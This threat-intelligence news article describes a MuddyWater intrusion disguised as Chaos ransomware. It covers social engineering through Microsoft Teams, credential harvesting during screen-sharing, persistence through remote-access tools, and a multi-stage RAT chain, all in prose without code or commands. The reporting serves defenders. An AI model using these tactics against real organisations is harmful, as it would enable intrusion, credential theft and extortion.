**MuddyWater** (also known as Mango Sandstorm, Seedworm, and Static Kitten) has been linked to a recent ransomware attack designed as a "false flag" operation. The group is known for its sophisticated campaigns targeting various sectors. ### Social Engineering via Microsoft Teams Observed by **Rapid7** in early 2026, the attack leverages social engineering techniques through **Microsoft Teams** to initiate the infection. While initially appearing to be the work of the **Chaos** ransomware-as-a-service (RaaS) group, evidence suggests a targeted, state-backed operation masquerading as opportunistic extortion. "The campaign was characterized by a high-touch social engineering phase conducted via **Microsoft Teams**, where the attackers utilized interactive screen-sharing to harvest credentials and manipulate multi-factor authentication (MFA)," **Rapid7** stated in their report. Instead of traditional file encryption, the group focused on data exfiltration and establishing long-term persistence using remote management tools like DWAgent. ### Blurring the Lines: Off-the-Shelf Tools **MuddyWater** is increasingly employing readily available tools from the cybercrime underground to complicate attribution efforts. This trend has been noted by **Ctrl-Alt-Intel**, **Broadcom**, **Check Point**, and **JUMPSEC**, highlighting the group's use of CastleRAT and Tsundere. ### MuddyWater's History with Ransomware This isn't the first time **MuddyWater** has engaged in ransomware attacks. In September 2020, they were linked to a campaign targeting Israeli organizations using a loader called PowGoop, which deployed a **Thanos** ransomware variant. In 2023, **Microsoft** revealed the group collaborated with DEV-1084 (known for using the DarkBit persona) to conduct destructive attacks under the guise of ransomware deployment. As recently as October 2025, the attackers are believed to have used the **Qilin** ransomware to target an Israeli government hospital. ### The Chaos RaaS Connection "In this case, the emerging picture was that the attackers were likely Iranian-affiliated operators working through the cyber criminal ecosystem, using a criminal ransomware brand and methods associated with the broader extortion market, while serving a strategic Iranian objective," **Check Point** noted. **Chaos**, a RaaS group that emerged in early 2025, is known for its double extortion model and advertises its affiliate program on cybercrime forums. Attacks by **Chaos** involve mail flooding and vishing using **Teams**, often impersonating IT support to trick victims into installing remote access tools like **Microsoft Quick Assist**. **Rapid7** also noted that **Chaos** has demonstrated triple extortion by threatening distributed denial-of-service (DDoS) attacks and quadruple extortion by threatening to contact customers or competitors.  As of late March 2026, **Chaos** has claimed 36 victims on its data leak site, primarily in the U.S., targeting sectors such as construction, manufacturing, and business services. ### Attack Methodology The intrusion analyzed by **Rapid7** showed the threat actor initiating external chat requests via **Teams** to engage employees and gain initial access through screen-sharing. They then used compromised accounts for reconnaissance, established persistence with tools like DWAgent and AnyDesk, moved laterally, and exfiltrated data before contacting the victim for ransom negotiations. "While connected, the TA [threat actor] executed basic discovery commands, accessed files related to the victim’s VPN configuration, and instructed users to enter their credentials into locally created text files," **Rapid7** explained. "In at least one instance, the TA also deployed a remote management tool (AnyDesk) to further facilitate access." The threat actor also used RDP to download an executable ("ms_upd.exe") from an external server using the curl utility, initiating a multi-stage infection chain. ### Malware Analysis Key malware components include: * `ms_upd.exe` (aka Stagecomp): Collects system information and connects to a command-and-control (C2) server to drop next-stage payloads. * `game.exe` (aka Darkcomp): A bespoke remote access trojan (RAT) masquerading as a legitimate **Microsoft WebView2** application. It is a trojanized version of the official **Microsoft** WebView2APISample project. * `WebView2Loader.dll`: A legitimate DLL required by **Microsoft Edge WebView2**. * `visualwincomp.txt`: An encrypted configuration used by the RAT to obtain the C2 information. The RAT connects to the C2 server and polls for new commands every 60 seconds, allowing it to run commands, PowerShell scripts, perform file operations, and spawn an interactive cmd.exe shell or PowerShell. ### Attribution to MuddyWater The campaign's links to **MuddyWater** are supported by the use of a code-signing certificate attributed to "Donald Gay" to sign "ms_upd.exe." This certificate has been previously used by the threat cluster to sign its malware, including a CastleLoader downloader called Fakeset.